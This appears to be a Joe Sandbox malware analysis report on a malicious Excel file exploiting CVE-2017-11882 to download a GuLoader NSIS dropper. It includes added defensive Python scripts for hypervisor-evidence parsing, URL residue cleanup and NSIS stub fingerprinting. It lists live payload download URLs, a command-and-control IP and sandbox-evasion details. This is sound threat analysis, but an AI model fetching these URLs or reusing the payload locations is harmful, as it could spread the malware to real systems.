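# The instance id may itself contain '#' (STORAGE volumes), so it is matched lazily up to the GUID.
_DEVPATH = re.compile(
    r"(?:\\\\\?\\|\\\?\?\\|\?\?\\)(?P<enum>[^#\\]+)#(?P<devid>[^#]+)#(?P<inst>.+?)#(?P<guid>\{[0-9a-fA-F-]{36}\})"
)


@dataclass
class DeviceInterface:
    enumerator: str
    device_type: str
    model: str
    revision: str
    instance: str
    interface_class: str
    hypervisor_hint: Optional[str]


def parse_device_paths(blob: str) -> list[DeviceInterface]:
    """Extract every device-interface path from a carved string (several may be concatenated)."""
    found: list[DeviceInterface] = []
    for m in _DEVPATH.finditer(blob):
        enum, devid, inst, guid = m.group("enum", "devid", "inst", "guid")
        dtype, model, revision = devid, "", ""
        if enum.upper() == "IDE":
            for typ in IDE_DEVICE_TYPES:
                if devid.startswith(typ):
                    body = devid[len(typ):]
                    dtype = typ
                    # The last 8 characters are the firmware revision; the rest is the model.
                    model = body[:-8].replace("_", " ").strip()
                    revision = body[-8:].replace("_", " ").strip()
                    break
        upper = model.upper()
        hint = next((mk for mk in HYPERVISOR_MARKERS if mk in upper), None)
        found.append(DeviceInterface(enum, dtype, model, revision, inst,
                                     INTERFACE_CLASSES.get(guid.lower(), guid), hint))
    return found


def hypervisor_evidence(strings: list[str]) -> list[str]:
    """Distinct device models across all strings that match a hypervisor marker."""
    seen: list[str] = []
    for s in strings:
        for dev in parse_device_paths(s):
            if dev.hypervisor_hint and dev.model not in seen:
                seen.append(dev.model)
    return seen


# The two strings exactly as listed in the memory-string evidence above.
SAMPLE_MEMORY_STRINGS = [
    r"??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H",
    r"\\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
    r"\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
    r"\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]",
]

if __name__ == "__main__":
    for s in SAMPLE_MEMORY_STRINGS:
        for dev in parse_device_paths(s):
            print(f"{dev.enumerator:8} {dev.device_type:7} {dev.model!r:32} rev={dev.revision!r:8} "
                  f"{dev.interface_class}  vm={dev.hypervisor_hint}")
```

Note that all three paths carry GUID_DEVINTERFACE_VOLUME even though the first describes a CD-ROM: these are volume interface paths as returned by volume enumeration, not raw device enumeration, so a sandbox that renames its disks but leaves the emulated CD-ROM model in place still leaks "NECVMWar VMware SATA CD01" through this route.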
    MITRE ATT&CK Matrix

    Techniques matched by at least one signature, grouped by tactic. The number in brackets is the count of matching signatures; the unmatched cells of the matrix template are omitted.

    Execution: Exploitation for Client Execution (22), Scripting (1), Native API (1)
    Privilege Escalation: Process Injection (11), Access Token Manipulation (1), Extra Window Memory Injection (1)
    Defense Evasion: Masquerading (111), Process Injection (11), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Access Token Manipulation (1), Scripting (1), Obfuscated Files or Information (1), Extra Window Memory Injection (1)
    Discovery: Security Software Discovery (21), System Information Discovery (15), File and Directory Discovery (2), Virtualization/Sandbox Evasion (1), Remote System Discovery (1)
    Collection: Archive Collected Data (1), Clipboard Data (1)
    Command and Control: Application Layer Protocol (121), Ingress Tool Transfer (33), Encrypted Channel (1), Non-Application Layer Protocol (1)
    Impact: System Shutdown/Reboot (1)
    Initial Access, Persistence, Credential Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects: no matches
    Antivirus, Machine Learning and Genetic Malware Detection

    Initial sample
    Source | Detection | Scanner | Label
    TransportLabel_6170453602.xlsx | 39% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

    Dropped files
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 14% | Metadefender | (no label)
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 23% | ReversingLabs | Win32.Downloader.GuLoader
    C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll | 0% | ReversingLabs | (no label)

    No Antivirus matches (two further detection tables are empty)

    URLs
    Source | Detection | Scanner | Label
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
    http://barsam.com.au/bin_QuCucbUMda229.bin | 0% | Avira URL Cloud | safe
    http://103.149.13.182/msdrive10/.svchost.exe | 100% | Avira URL Cloud | malware
    http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
    http://103.149.13.182/msdrive10/.svchost.exemmC: | 0% | Avira URL Cloud | safe
    http://103.149.13.182/msdrive10/.svchost.exeigh | 0% | Avira URL Cloud | safe
    http://103.149.13.182/msdrive10/.svchost.exej | 0% | Avira URL Cloud | safe
    https://sectigo.com/CPS0C | 0% | URL Reputation | safe
    No contacted domains info
    Contacted URLs
    Name | Malicious | Antivirus Detection | Reputation
    http://barsam.com.au/bin_QuCucbUMda229.bin | true | Avira URL Cloud: safe | unknown
    http://103.149.13.182/msdrive10/.svchost.exe | true | Avira URL Cloud: malware | unknown

    URLs from Memory and Binaries
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | false | URL Reputation: safe | unknown
    http://nsis.sf.net/NSIS_ErrorError | EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr | false | (none) | high
    http://ocsp.sectigo.com0 | vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | false | URL Reputation: safe | unknown
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | false | URL Reputation: safe | unknown
    http://103.149.13.182/msdrive10/.svchost.exemmC: | EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://103.149.13.182/msdrive10/.svchost.exeigh | EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://103.149.13.182/msdrive10/.svchost.exej | EQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    https://sectigo.com/CPS0C | vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr | false | URL Reputation: safe | unknown

    The characters trailing ".exe", ".crl" and ".crt" in these entries (mmC:, igh, j, 0s, 0#, 0C) are bytes that sat next to the URL in memory and were swept up by the string scanner; they are not part of the URL. The clean download URL is http://103.149.13.182/msdrive10/.svchost.exe, as the IE cache entry for the dropped file confirms, and the Sectigo CRL/OCSP/CPS URLs come from the code-signing certificate embedded in wxbase30u_xml_gcc_custom.dll, not from the malware's own network activity.
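
Carving residue of this kind turns one payload URL into four table rows, so it is worth normalising before URLs go into blocklists or pivots. The script below is an added example written for this report, not Joe Sandbox code: it takes the raw strings exactly as the tables above list them, cuts each back to its last known file extension (or to an alphabetic TLD when the URL has no path), groups the variants under the clean URL and separates payload URLs from the certificate-infrastructure URLs. The extension list, the bare-host rule and the PKI heuristic are this example's assumptions; residue that follows a path without a known extension (the "0C" after /CPS) is left alone because nothing in the string says where the URL ends.

```python
"""Carve URLs from memory-string dumps and strip the residue string carving leaves behind.

Added example for this report, not Joe Sandbox code. A strings scanner stops only at a
non-printable byte, so a URL is reported together with whatever printable bytes followed
it in memory. The raw strings below are copied from the report's URL tables; the
payload-extension list, the bare-host rule and the PKI-infrastructure heuristic are
this example's assumptions.
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Raw strings as the scanner reported them (copied from the URL tables above).
RAW_URL_STRINGS = [
    "http://103.149.13.182/msdrive10/.svchost.exemmC:",
    "http://103.149.13.182/msdrive10/.svchost.exeigh",
    "http://103.149.13.182/msdrive10/.svchost.exej",
    "http://barsam.com.au/bin_QuCucbUMda229.bin",
    "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s",
    "http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#",
    "http://ocsp.sectigo.com0",
    "https://sectigo.com/CPS0C",
    "http://nsis.sf.net/NSIS_ErrorError",
]

# Extensions that end a download URL; anything after them in the path is carving residue (assumed list).
PAYLOAD_EXTENSIONS = (".exe", ".dll", ".scr", ".bin", ".zip", ".dat", ".crl", ".crt")
_URL_RE = re.compile(r"https?://[\x21-\x7e]+")  # scheme followed by a run of printable, non-space bytes
_ALPHA_TLD_RE = re.compile(r"\.[a-z]{2,}$")


def trim_residue(url: str) -> str:
    """Cut a carved URL back to its last known extension, or to an alphabetic TLD if it has no path."""
    parts = urlsplit(url)
    path_l = parts.path.lower()
    cut = max((path_l.rfind(ext) + len(ext) for ext in PAYLOAD_EXTENSIONS if ext in path_l), default=0)
    if cut:
        return f"{parts.scheme}://{parts.netloc}{parts.path[:cut]}"
    if parts.path in ("", "/") and not _ALPHA_TLD_RE.search(parts.netloc.lower()):
        # Bare host such as "ocsp.sectigo.com0": a TLD is alphabetic, so trailing digits are residue.
        return f"{parts.scheme}://{parts.netloc.rstrip('0123456789')}"
    return url


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def classify(url: str) -> str:
    """Rough triage class for a normalised URL (heuristic)."""
    parts = urlsplit(url)
    host, path = (parts.hostname or ""), parts.path.lower()
    if path.endswith((".crl", ".crt")) or host.startswith(("ocsp.", "crl.", "crt.")) or path.startswith("/cps"):
        return "pki-infrastructure"  # revocation/CPS URLs embedded in a code-signing certificate
    if path.endswith((".exe", ".dll", ".scr", ".bin")):
        return "payload (bare-IP host)" if _is_ip(host) else "payload"
    return "other"


def triage(raw_strings: list[str]) -> dict[str, dict]:
    """Map each normalised URL to the raw variants it was carved from and its class."""
    groups: dict[str, dict] = defaultdict(lambda: {"raw": [], "class": "other"})
    for s in raw_strings:
        for m in _URL_RE.finditer(s):
            canon = trim_residue(m.group(0))
            groups[canon]["raw"].append(m.group(0))
            groups[canon]["class"] = classify(canon)
    return dict(groups)


def payload_urls(raw_strings: list[str]) -> list[str]:
    """Sorted list of distinct download URLs worth blocking or pivoting on."""
    return sorted(u for u, g in triage(raw_strings).items() if g["class"].startswith("payload"))


if __name__ == "__main__":
    for url, info in triage(RAW_URL_STRINGS).items():
        print(f"{info['class']:24} {url}  <- {len(info['raw'])} raw string(s)")
    print("payloads:", payload_urls(RAW_URL_STRINGS))
```

Run against the nine raw strings, the three .svchost.exe variants collapse into one bare-IP payload URL, the Sectigo entries are recognised as certificate plumbing, and the NSIS error URL is left as "other" (it is a hard-coded string in every NSIS stub, useful as a packer indicator rather than as an indicator of compromise).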
      Contacted IPs
      IP | Domain | Country | ASN | ASN Name | Malicious
      103.149.13.182 | unknown | unknown | 135905 | VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP, VN | true
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:624947
      Start date and time:12/05/2022 09:26:39 (2022-05-12 09:26:39 +02:00)
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 59s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:TransportLabel_6170453602.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/26@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.5% (good quality ratio 84.2%)
      • Quality average: 87%
      • Quality standard deviation: 21.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 44
      • Number of non-executed functions: 35
      Cookbook Comments:
      • Found application associated with file extension: .xlsx
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: TransportLabel_6170453602.xlsx
      Time | Type | Description
      09:28:37 | API Interceptor | 116x Sleep call for process: EQNEDT32.EXE modified
      Context: IPs seen in other analyses
      Match: 103.149.13.182
      Associated Sample Name / URL | Detection | Context
      • OR17233976_00019489_20170619154218.xlsx | malicious | 103.149.13.182/365space/.svchost.exe
      No context
      Context: ASN seen in other analyses
      Match: VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP, VN
      Associated Sample Name / URL | Detection | Context (IP)
      • JVEdWgNqjA.ps1 | malicious | 103.133.105.61
      • RFQ DOCUMENT.xlsx | malicious | 180.214.236.4
      • DRAFT SHIPPING DOCUMENTS.xlsx | malicious | 103.99.0.198
      • Comanda furnizorului-83613.xlsx | malicious | 180.214.238.224
      • OR17233976_00019489_20170619154218.xlsx | malicious | 103.149.13.182
      • POFOODEXPO2022.xlsx | malicious | 103.149.12.43
      • Quotation.xlsx | malicious | 103.145.255.4
      • NEW ORDER.xlsx | malicious | 103.99.0.198
      • Quotation Request From Wnsche Group GmbH Germany.xlsx | malicious | 103.141.138.195
      • pedido_639.xlsx | malicious | 103.89.89.198
      • PO050522_Airhawk.xlsx | malicious | 103.149.12.43
      • AWB_NO_9284730932.xlsx | malicious | 103.147.185.53
      • AWB_NO_9284730932.xlsx | malicious | 103.147.185.53
      • PR 00120181213.xlsx | malicious | 103.89.89.198
      • DHL_AWB_NO#907853880911.xlsx | malicious | 103.147.185.100
      • 6kNanOe8YB | malicious | 123.31.41.38
      • E4HNV1HTPK.exe | malicious | 103.147.185.85
      • Payment Voucher.xlsx | malicious | 103.147.185.85
      • IRQ2207798.xlsx | malicious | 103.89.89.198
      • dEHXEDmi4s | malicious | 14.225.246.69
      No context
      Context: dropped files seen in other analyses
      Match: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll
      Associated Sample Name / URL | Detection
      • OR17233976_00019489_20170619154218.xlsx | malicious
      • DWG-1579.exe | malicious
      • RFQ-1579.exe | malicious
      • DWG-1579.exe | malicious
      • RFQ-1579.xlsx | malicious
      Match: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll
      Associated Sample Name / URL | Detection
      • OR17233976_00019489_20170619154218.xlsx | malicious
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:downloaded
                  Size (bytes):326847
                  Entropy (8bit):7.537994904334399
                  Encrypted:false
                  SSDEEP:6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
                  MD5:D5E55A57372BCAD45FBB260105179CAF
                  SHA1:9B1935A927C072DD31017362FF1739BF1EA2AAF7
                  SHA-256:3C27C2AA1BC826FAA65AB4038EB385CABD6DB50108410E6F674D455AA1DC5532
                  SHA-512:088033564668A4FD3E107566387FECF0B6DCBD7A161C9EF3E4ADB232520467A64AF9EEC740FE783D5C62FA3B79BDD910E72F3ACC838E5FA155427C83003C407B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 14%, Browse
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
                  IE Cache URL:http://103.149.13.182/msdrive10/.svchost.exe
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................
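
The downloaded .svchost[1].exe is typed above as a Nullsoft Installer self-extracting archive, its header preview shows the ".ndata" section NSIS stubs carry, and the dropped nsf2EB0.tmp\System.dll is the NSIS System plug-in, so an analyst's first question is whether a file is an NSIS stub before unpacking it. The script below is an added example written for this report, not Joe Sandbox code and not the dropped file: it walks the PE section table, locates the overlay after the last section and looks there for the NSIS "first header" (four flag bytes, the signature 0xDEADBEEF, the ASCII magic "NullsoftInst", then the header length and the length of all following data). The PE it analyses is constructed in memory as test input; the section names and order mirror the preview above, the sizes are invented.

```python
"""Fingerprint an NSIS (Nullsoft) self-extracting stub from its PE section table and overlay.

Added example for this report, not Joe Sandbox code. An NSIS stub keeps the compressed
archive as an overlay after the last section, starting with a "first header":
4 flag bytes, the signature 0xDEADBEEF, the magic "NullsoftInst", the header length and
the length of all following data. The PE built by build_constructed_nsis_stub() is
synthetic test input, not the file from this report.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"  # 0xDEADBEEF little-endian followed by "NullsoftInst"
_SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_ptr: int
    characteristics: int


def parse_sections(data: bytes) -> list[Section]:
    """Walk MZ -> PE signature -> COFF header -> section table (optional header is skipped by size)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    (nsections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(_SECTION_FMT, data, table + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vsize, vaddr, rawsize, rawptr, chars))
    return sections


def nsis_fingerprint(data: bytes) -> dict:
    """NSIS indicators: an uninitialised .ndata section plus a first header inside the overlay."""
    sections = parse_sections(data)
    overlay = max((s.raw_ptr + s.raw_size for s in sections), default=len(data))
    ndata = next((s for s in sections if s.name == ".ndata"), None)
    magic_off = data.find(NSIS_MAGIC)
    result = {
        "has_ndata_section": ndata is not None and ndata.raw_size == 0 and ndata.virtual_size > 0,
        "overlay_offset": overlay,
        "overlay_size": len(data) - overlay,
        "nsis_magic_offset": magic_off,          # -1 when absent
        "nsis_header_in_overlay": magic_off >= overlay,
    }
    if magic_off >= 0:
        hdr_len, data_len = struct.unpack_from("<II", data, magic_off + len(NSIS_MAGIC))
        result.update(header_length=hdr_len, archive_length=data_len)
    result["is_nsis"] = result["has_ndata_section"] and result["nsis_header_in_overlay"]
    return result


def build_constructed_nsis_stub() -> bytes:
    """Minimal PE32 with an NSIS-style section table and a fake NSIS overlay (constructed test input)."""
    e_lfanew = 0x80
    buf = bytearray(0xC00)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # COFF header: Machine=i386, 5 sections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader=224, flags
    struct.pack_into("<HHIIIHH", buf, e_lfanew + 4, 0x14C, 5, 0, 0, 0, 224, 0x102)
    struct.pack_into("<H", buf, e_lfanew + 24, 0x10B)  # optional header magic: PE32
    table = e_lfanew + 24 + 224
    #          name      vsize    vaddr    rawsize rawptr chars
    layout = [(b".text",  0x6800,  0x1000,  0x200,  0x400, 0x60000020),
              (b".rdata", 0x1200,  0x8000,  0x200,  0x600, 0x40000040),
              (b".data",  0x39F78, 0xA000,  0x200,  0x800, 0xC0000040),
              (b".ndata", 0x3A000, 0x44000, 0,      0,     0xC0000080),  # uninitialised: no raw data
              (b".rsrc",  0x5900,  0x7E000, 0x200,  0xA00, 0x40000040)]
    for i, (name, vsize, vaddr, rawsize, rawptr, chars) in enumerate(layout):
        struct.pack_into(_SECTION_FMT, buf, table + 40 * i, name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
    # Overlay at 0xC00: flags, 0xDEADBEEF + "NullsoftInst", header length, archive length, dummy payload.
    overlay = struct.pack("<I", 0) + NSIS_MAGIC + struct.pack("<II", 0x1000, 0x4E000) + b"\0" * 64
    return bytes(buf) + overlay


if __name__ == "__main__":
    sample = build_constructed_nsis_stub()
    for s in parse_sections(sample):
        print(f"{s.name:8} vsize={s.virtual_size:#08x} raw={s.raw_size:#06x}@{s.raw_ptr:#06x}")
    print(nsis_fingerprint(sample))
```

To run it on a real sample, replace build_constructed_nsis_stub() with the file's bytes; a genuine NSIS stub reports a .ndata section with zero raw size and the magic within the first few hundred bytes of the overlay, and header_length plus archive_length together bound the compressed installer data that 7-Zip or a dedicated NSIS decompiler will unpack.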
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                  Category:dropped
                  Size (bytes):4396
                  Entropy (8bit):7.884233298494423
                  Encrypted:false
                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):11303
                  Entropy (8bit):7.909402464702408
                  Encrypted:false
                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):2647
                  Entropy (8bit):7.8900124483490135
                  Encrypted:false
                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                  MD5:E46357D82EBC866EEBDA98FA8F94B385
                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                  Category:dropped
                  Size (bytes):4396
                  Entropy (8bit):7.884233298494423
                  Encrypted:false
                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                  Malicious:false
